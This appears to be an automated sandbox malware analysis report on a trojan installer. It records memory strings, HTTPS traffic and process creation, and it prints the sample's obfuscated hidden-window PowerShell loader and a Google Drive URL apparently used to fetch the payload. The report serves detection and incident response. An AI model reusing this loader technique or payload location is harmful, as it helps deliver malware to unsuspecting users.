      Source: Autocueing.exe, 00000008.00000003.3193568265.000000000345E000.00000004.00000020.00020000.00000000.sdmp, Autocueing.exe, 00000008.00000003.3122962700.000000000345E000.00000004.00000020.00020000.00000000.sdmp, Autocueing.exe, 00000008.00000003.3147400004.000000000345E000.00000004.00000020.00020000.00000000.sdmp, Autocueing.exe, 00000008.00000003.2933747254.000000000345E000.00000004.00000020.00020000.00000000.sdmp, Autocueing.exe, 00000008.00000003.3159034020.000000000345E000.00000004.00000020.00020000.00000000.sdmp, Autocueing.exe, 00000008.00000003.2887404715.000000000345E000.00000004.00000020.00020000.00000000.sdmp, Autocueing.exe, 00000008.00000003.3206827523.000000000345E000.00000004.00000020.00020000.00000000.sdmp, Autocueing.exe, 00000008.00000003.3136123204.0000000003463000.00000004.00000020.00020000.00000000.sdmp, Autocueing.exe, 00000008.00000003.3170311174.000000000345E000.00000004.00000020.00020000.00000000.sdmp, Autocueing.exe, 00000008.00000003.2899186565.000000000345E000.00000004.00000020.00020000.00000000.sdmp, Autocueing.exe, 00000008.00000003.2910627021.000000000345E000.00000004.00000020.00020000.00000000.sdmp, Autocueing.exe, 00000008.00000003.3217749559.000000000345E000.00000004.00000020.00020000.00000000.sdmp, Autocueing.exe, 00000008.00000003.2922227503.000000000345E000.00000004.00000020.00020000.00000000.sdmp, Autocueing.exe, 00000008.00000003.3135380542.000000000345E000.00000004.00000020.00020000.00000000.sdmp, Autocueing.exe, 00000008.00000003.3182811158.000000000345E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/download?id=1_v7mPqiekafjqjNlgzAtvpzw_A7pqv34&export=downloadt
      Source: Autocueing.exe, 00000008.00000003.2887404715.000000000345E000.00000004.00000020.00020000.00000000.sdmp, Autocueing.exe, 00000008.00000003.2876323516.000000000345E000.00000004.00000020.00020000.00000000.sdmp, Autocueing.exe, 00000008.00000003.2864019301.000000000345E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/download?id=1_v7mPqiekafjqjNlgzAtvpzw_A7pqv34&export=downloaduf
      Source: Autocueing.exe, 00000008.00000003.3357241032.000000000345E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/download?id=1_v7mPqiekafjqjNlgzAtvpzw_A7pqv34&export=downloady
      Source: Autocueing.exe, 00000008.00000003.2995816614.000000000345E000.00000004.00000020.00020000.00000000.sdmp, Autocueing.exe, 00000008.00000003.2982316924.000000000345E000.00000004.00000020.00020000.00000000.sdmp, Autocueing.exe, 00000008.00000003.3006734632.000000000345E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/download?id=1_v7mPqiekafjqjNlgzAtvpzw_A7pqv34&export=downloadz5
      Source: Autocueing.exe, 00000008.00000003.2658888711.000000000345E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/download?id=1_v7mPqiekafjqjNlgzAtvpzw_A7pqv34&export=download~9
      Source: Autocueing.exe, 00000008.00000002.3395765664.0000000003432000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/download?id=1_v7mPqiekafjqjNlgzKd
      Source: Autocueing.exe, 00000008.00000002.3395765664.0000000003432000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/download?id=1_v7mPqiekafjqjNlgzOe
      Source: Autocueing.exe, 00000008.00000003.3089505610.000000000345E000.00000004.00000020.00020000.00000000.sdmp, Autocueing.exe, 00000008.00000003.3042334490.000000000345E000.00000004.00000020.00020000.00000000.sdmp, Autocueing.exe, 00000008.00000003.3100280584.000000000345E000.00000004.00000020.00020000.00000000.sdmp, Autocueing.exe, 00000008.00000003.3076301554.000000000345E000.00000004.00000020.00020000.00000000.sdmp, Autocueing.exe, 00000008.00000003.3053814050.000000000345E000.00000004.00000020.00020000.00000000.sdmp, Autocueing.exe, 00000008.00000003.3112204517.000000000345E000.00000004.00000020.00020000.00000000.sdmp, Autocueing.exe, 00000008.00000003.3029253824.000000000345E000.00000004.00000020.00020000.00000000.sdmp, Autocueing.exe, 00000008.00000003.3065378024.000000000345E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/download?id=1_v7mPqiekap
      Source: Autocueing.exe, 00000008.00000003.3089505610.000000000345E000.00000004.00000020.00020000.00000000.sdmp, Autocueing.exe, 00000008.00000003.3042334490.000000000345E000.00000004.00000020.00020000.00000000.sdmp, Autocueing.exe, 00000008.00000003.3256468742.000000000345E000.00000004.00000020.00020000.00000000.sdmp, Autocueing.exe, 00000008.00000003.3242307516.0000000003463000.00000004.00000020.00020000.00000000.sdmp, Autocueing.exe, 00000008.00000003.3100280584.000000000345E000.00000004.00000020.00020000.00000000.sdmp, Autocueing.exe, 00000008.00000003.3076301554.000000000345E000.00000004.00000020.00020000.00000000.sdmp, Autocueing.exe, 00000008.00000003.3229828688.000000000345E000.00000004.00000020.00020000.00000000.sdmp, Autocueing.exe, 00000008.00000003.3267586031.000000000345E000.00000004.00000020.00020000.00000000.sdmp, Autocueing.exe, 00000008.00000003.3217749559.000000000345E000.00000004.00000020.00020000.00000000.sdmp, Autocueing.exe, 00000008.00000003.3053814050.000000000345E000.00000004.00000020.00020000.00000000.sdmp, Autocueing.exe, 00000008.00000003.3112204517.000000000345E000.00000004.00000020.00020000.00000000.sdmp, Autocueing.exe, 00000008.00000003.3242196784.000000000345E000.00000004.00000020.00020000.00000000.sdmp, Autocueing.exe, 00000008.00000003.3230193224.0000000003463000.00000004.00000020.00020000.00000000.sdmp, Autocueing.exe, 00000008.00000003.3029253824.000000000345E000.00000004.00000020.00020000.00000000.sdmp, Autocueing.exe, 00000008.00000003.3065378024.000000000345E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/download?id=1_v7mPqiekat
      Source: Autocueing.exe, 00000008.00000002.3395765664.0000000003432000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/id=1_v7mPqiekafjqjNlgzAtvpzw_A7pqv34&e
      Source: Autocueing.exe, 00000008.00000003.3279195163.000000000345E000.00000004.00000020.00020000.00000000.sdmp, Autocueing.exe, 00000008.00000003.3256468742.000000000345E000.00000004.00000020.00020000.00000000.sdmp, Autocueing.exe, 00000008.00000003.3302032884.000000000345E000.00000004.00000020.00020000.00000000.sdmp, Autocueing.exe, 00000008.00000003.3242307516.0000000003463000.00000004.00000020.00020000.00000000.sdmp, Autocueing.exe, 00000008.00000003.3267586031.000000000345E000.00000004.00000020.00020000.00000000.sdmp, Autocueing.exe, 00000008.00000003.3242196784.000000000345E000.00000004.00000020.00020000.00000000.sdmp, Autocueing.exe, 00000008.00000003.3290522489.000000000345E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/id=1_v7mPqiekafjqjNlgzAtvpzw_A7pqv34&eh
      Source: Autocueing.exe, 00000008.00000003.3346088252.000000000345E000.00000004.00000020.00020000.00000000.sdmp, Autocueing.exe, 00000008.00000002.3395765664.000000000345E000.00000004.00000020.00020000.00000000.sdmp, Autocueing.exe, 00000008.00000003.3334442052.000000000345E000.00000004.00000020.00020000.00000000.sdmp, Autocueing.exe, 00000008.00000003.3391633613.000000000345E000.00000004.00000020.00020000.00000000.sdmp, Autocueing.exe, 00000008.00000003.3368992406.000000000345E000.00000004.00000020.00020000.00000000.sdmp, Autocueing.exe, 00000008.00000003.3379961503.000000000345E000.00000004.00000020.00020000.00000000.sdmp, Autocueing.exe, 00000008.00000003.3357241032.000000000345E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/roject.net
      Source: Autocueing.exe, 00000008.00000003.2995816614.000000000345E000.00000004.00000020.00020000.00000000.sdmp, Autocueing.exe, 00000008.00000003.2982316924.000000000345E000.00000004.00000020.00020000.00000000.sdmp, Autocueing.exe, 00000008.00000003.3018318612.000000000345E000.00000004.00000020.00020000.00000000.sdmp, Autocueing.exe, 00000008.00000003.3006734632.000000000345E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/serv
      Source: Autocueing.exe, 00000008.00000002.3395765664.000000000345E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/z
      Source: powershell.exe, 00000002.00000002.2516453019.0000000004CB6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/Pester
      Source: Autocueing.exe, 00000008.00000001.2515081160.0000000000649000.00000020.00000001.01000000.00000008.sdmpString found in binary or memory: https://inference.location.live.net/inferenceservice/v21/Pox/GetLocationUsingFingerprinte1e71f6b-214
      Source: powershell.exe, 00000002.00000002.2519636731.0000000005BC5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nuget.org/nuget.exe
      Source: Autocueing.exe, 00000008.00000003.2899186565.000000000345E000.00000004.00000020.00020000.00000000.sdmp, Autocueing.exe, 00000008.00000003.2910627021.000000000345E000.00000004.00000020.00020000.00000000.sdmp, Autocueing.exe, 00000008.00000003.2922227503.000000000345E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ssl.g
      Source: Autocueing.exe, 00000008.00000003.3006734632.000000000345E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ssl.gstatic.com
      Source: Autocueing.exe, 00000008.00000003.2899186565.000000000345E000.00000004.00000020.00020000.00000000.sdmp, Autocueing.exe, 00000008.00000003.2910627021.000000000345E000.00000004.00000020.00020000.00000000.sdmp, Autocueing.exe, 00000008.00000003.2922227503.000000000345E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://translate.google.com/translate_a/elem
      Source: Autocueing.exe, 00000008.00000003.3006734632.000000000345E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://translate.google.com/translate_a/element.js
      Source: Autocueing.exe, 00000008.00000003.3006734632.000000000345E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://translate.googleapis.com/_/translate_http/_/js/;report-uri
      Source: Autocueing.exe, 00000008.00000003.2899186565.000000000345E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google-analytics.
      Source: Autocueing.exe, 00000008.00000003.3006734632.000000000345E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google-analytics.com/analytics.js
      Source: Autocueing.exe, 00000008.00000003.3006734632.000000000345E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google-analytics.com;report-uri
      Source: Autocueing.exe, 00000008.00000003.3006734632.000000000345E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google.com
      Source: Autocueing.exe, 00000008.00000003.3006734632.000000000345E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.googletagmanager.com
      Source: Autocueing.exe, 00000008.00000003.3006734632.000000000345E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.gstatic.com
      Source: unknownNetwork traffic detected: HTTP traffic on port 50013 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 50036 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49981
      Source: unknownNetwork traffic detected: HTTP traffic on port 50042 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 50007 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50054
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50053
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50055
      Source: unknownNetwork traffic detected: HTTP traffic on port 50022 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49990 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 50045 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49973
      Source: unknownNetwork traffic detected: HTTP traffic on port 49996 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 50018 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 50025 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49964 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 50004 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 50053 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49981 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49999 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49964
      Source: unknownNetwork traffic detected: HTTP traffic on port 50009 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 50034 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 50015 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 50040 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49989 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 50001 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 50028 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 50031 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49992 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 50043 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49956
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50007
      Source: unknownNetwork traffic detected: HTTP traffic on port 50037 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50006
      Source: unknownNetwork traffic detected: HTTP traffic on port 50012 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50009
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50008
      Source: unknownNetwork traffic detected: HTTP traffic on port 49994 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 50020 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50001
      Source: unknownNetwork traffic detected: HTTP traffic on port 50054 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50000
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50003
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50002
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50005
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50004
      Source: unknownNetwork traffic detected: HTTP traffic on port 50051 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 50048 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 50006 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 50023 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49948
      Source: unknownNetwork traffic detected: HTTP traffic on port 49997 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49942
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50018
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50017
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50019
      Source: unknownNetwork traffic detected: HTTP traffic on port 50017 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 50032 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50012
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50011
      Source: unknownNetwork traffic detected: HTTP traffic on port 50055 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50013
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50016
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50015
      Source: unknownNetwork traffic detected: HTTP traffic on port 50049 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 50026 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 50003 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 50052 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49942 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50029
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50028
      Source: unknownNetwork traffic detected: HTTP traffic on port 50035 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 50008 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50021
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50020
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50023
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50022
      Source: unknownNetwork traffic detected: HTTP traffic on port 49988 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50025
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50024
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50027
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50026
      Source: unknownNetwork traffic detected: HTTP traffic on port 50000 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 50046 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 50021 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50030
      Source: unknownNetwork traffic detected: HTTP traffic on port 49991 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 50029 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49995 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 50038 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 50011 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50032
      Source: unknownNetwork traffic detected: HTTP traffic on port 50019 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50031
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50034
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50033
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50036
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50035
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50038
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50037
      Source: unknownNetwork traffic detected: HTTP traffic on port 50050 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 50047 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49956 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 50005 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50041
      Source: unknownNetwork traffic detected: HTTP traffic on port 50024 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50040
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49999
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49998
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49997
      Source: unknownNetwork traffic detected: HTTP traffic on port 49973 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49948 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49996
      Source: unknownNetwork traffic detected: HTTP traffic on port 49998 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49995
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49994
      Source: unknownNetwork traffic detected: HTTP traffic on port 50016 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 50041 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49992
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49991
      Source: unknownNetwork traffic detected: HTTP traffic on port 50033 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49990
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50043
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50042
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50045
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50044
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50047
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50046
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50049
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50048
      Source: unknownNetwork traffic detected: HTTP traffic on port 50002 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50050
      Source: unknownNetwork traffic detected: HTTP traffic on port 50027 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 50030 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50052
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50051
      Source: unknownNetwork traffic detected: HTTP traffic on port 50044 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49989
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49988
      Source: unknownHTTPS traffic detected: 142.250.185.142:443 -> 192.168.2.6:49942 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 142.250.185.129:443 -> 192.168.2.6:49948 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 142.250.185.142:443 -> 192.168.2.6:49997 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 142.250.185.142:443 -> 192.168.2.6:49999 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 142.250.185.142:443 -> 192.168.2.6:50001 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 142.250.185.142:443 -> 192.168.2.6:50005 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 142.250.185.142:443 -> 192.168.2.6:50009 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 142.250.185.142:443 -> 192.168.2.6:50019 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 142.250.185.142:443 -> 192.168.2.6:50021 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 142.250.185.142:443 -> 192.168.2.6:50025 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 142.250.185.142:443 -> 192.168.2.6:50027 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 142.250.185.142:443 -> 192.168.2.6:50029 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 142.250.185.142:443 -> 192.168.2.6:50031 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 142.250.185.142:443 -> 192.168.2.6:50035 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 142.250.185.142:443 -> 192.168.2.6:50046 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 142.250.185.142:443 -> 192.168.2.6:50050 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 142.250.185.142:443 -> 192.168.2.6:50054 version: TLS 1.2
      Source: C:\Users\user\Desktop\av8XPPpdBc.exeCode function: 0_2_0040571B GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,ShowWindow,ShowWindow,GetDlgItem,SendMessageW,SendMessageW,SendMessageW,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,ShowWindow,ShowWindow,SendMessageW,CreatePopupMenu,AppendMenuW,GetWindowRect,TrackPopupMenu,SendMessageW,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageW,GlobalUnlock,SetClipboardData,CloseClipboard,0_2_0040571B

      System Summary

      barindex
      Powershell drops PE file
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\Autocueing.exeJump to dropped file
      Source: C:\Users\user\Desktop\av8XPPpdBc.exeCode function: 0_2_00403532 EntryPoint,SetErrorMode,GetVersionExW,GetVersionExW,GetVersionExW,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,lstrlenW,wsprintfW,GetFileAttributesW,DeleteFileW,SetCurrentDirectoryW,CopyFileW,OleUninitialize,ExitProcess,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,0_2_00403532
      Source: C:\Users\user\Desktop\av8XPPpdBc.exeCode function: 0_2_00406DC60_2_00406DC6
      Source: C:\Users\user\Desktop\av8XPPpdBc.exeCode function: 0_2_0040759D0_2_0040759D
      Source: Joe Sandbox ViewDropped File: C:\Users\user\AppData\Local\Temp\nswE27F.tmp\nsExec.dll 01E72332362345C415A7EDCB366D6A1B52BE9AC6E946FB9DA49785C140BA1A4B
      Source: av8XPPpdBc.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
      Source: classification engineClassification label: mal100.troj.evad.winEXE@6/13@2/2
      Source: C:\Users\user\Desktop\av8XPPpdBc.exeCode function: 0_2_00403532 EntryPoint,SetErrorMode,GetVersionExW,GetVersionExW,GetVersionExW,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,lstrlenW,wsprintfW,GetFileAttributesW,DeleteFileW,SetCurrentDirectoryW,CopyFileW,OleUninitialize,ExitProcess,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,0_2_00403532
      Source: C:\Users\user\Desktop\av8XPPpdBc.exeCode function: 0_2_004049C7 GetDlgItem,SetWindowTextW,SHBrowseForFolderW,CoTaskMemFree,lstrcmpiW,lstrcatW,SetDlgItemTextW,GetDiskFreeSpaceW,MulDiv,SetDlgItemTextW,0_2_004049C7
      Source: C:\Users\user\Desktop\av8XPPpdBc.exeCode function: 0_2_004021AF CoCreateInstance,0_2_004021AF
      Source: C:\Users\user\Desktop\av8XPPpdBc.exeFile created: C:\Users\user\AppData\Roaming\erstatningsgradenJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMutant created: NULL
      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6688:120:WilError_03
      Source: C:\Users\user\Desktop\av8XPPpdBc.exeFile created: C:\Users\user\AppData\Local\Temp\nsbE0C9.tmpJump to behavior
      Source: av8XPPpdBc.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Process
      Source: C:\Users\user\Desktop\av8XPPpdBc.exeFile read: C:\Users\desktop.iniJump to behavior
      Source: C:\Users\user\Desktop\av8XPPpdBc.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
      Source: av8XPPpdBc.exeVirustotal: Detection: 48%
      Source: av8XPPpdBc.exeReversingLabs: Detection: 62%
      Source: C:\Users\user\Desktop\av8XPPpdBc.exeFile read: C:\Users\user\Desktop\av8XPPpdBc.exeJump to behavior
      Source: unknownProcess created: C:\Users\user\Desktop\av8XPPpdBc.exe "C:\Users\user\Desktop\av8XPPpdBc.exe"
      Source: C:\Users\user\Desktop\av8XPPpdBc.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe -windowstyle hidden "$Vordingborg133=gc -raw 'C:\Users\user\AppData\Roaming\erstatningsgraden\Observatorers\Negeringsfunktioners209.Thi';$prepenial=$Vordingborg133.SubString(71057,3);.$prepenial($Vordingborg133) "
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Users\user\AppData\Local\Temp\Autocueing.exe "C:\Users\user\AppData\Local\Temp\Autocueing.exe"
      Source: C:\Users\user\Desktop\av8XPPpdBc.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe -windowstyle hidden "$Vordingborg133=gc -raw 'C:\Users\user\AppData\Roaming\erstatningsgraden\Observatorers\Negeringsfunktioners209.Thi';$prepenial=$Vordingborg133.SubString(71057,3);.$prepenial($Vordingborg133) "Jump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Users\user\AppData\Local\Temp\Autocueing.exe "C:\Users\user\AppData\Local\Temp\Autocueing.exe"Jump to behavior
      Source: C:\Users\user\Desktop\av8XPPpdBc.exeSection loaded: uxtheme.dllJump to behavior
      Source: C:\Users\user\Desktop\av8XPPpdBc.exeSection loaded: userenv.dllJump to behavior
      Source: C:\Users\user\Desktop\av8XPPpdBc.exeSection loaded: apphelp.dllJump to behavior
      Source: C:\Users\user\Desktop\av8XPPpdBc.exeSection loaded: propsys.dllJump to behavior
      Source: C:\Users\user\Desktop\av8XPPpdBc.exeSection loaded: dwmapi.dllJump to behavior
      Source: C:\Users\user\Desktop\av8XPPpdBc.exeSection loaded: cryptbase.dllJump to behavior
      Source: C:\Users\user\Desktop\av8XPPpdBc.exeSection loaded: oleacc.dllJump to behavior
      Source: C:\Users\user\Desktop\av8XPPpdBc.exeSection loaded: ntmarta.dllJump to behavior
      Source: C:\Users\user\Desktop\av8XPPpdBc.exeSection loaded: version.dllJump to behavior
      Source: C:\Users\user\Desktop\av8XPPpdBc.exeSection loaded: shfolder.dllJump to behavior
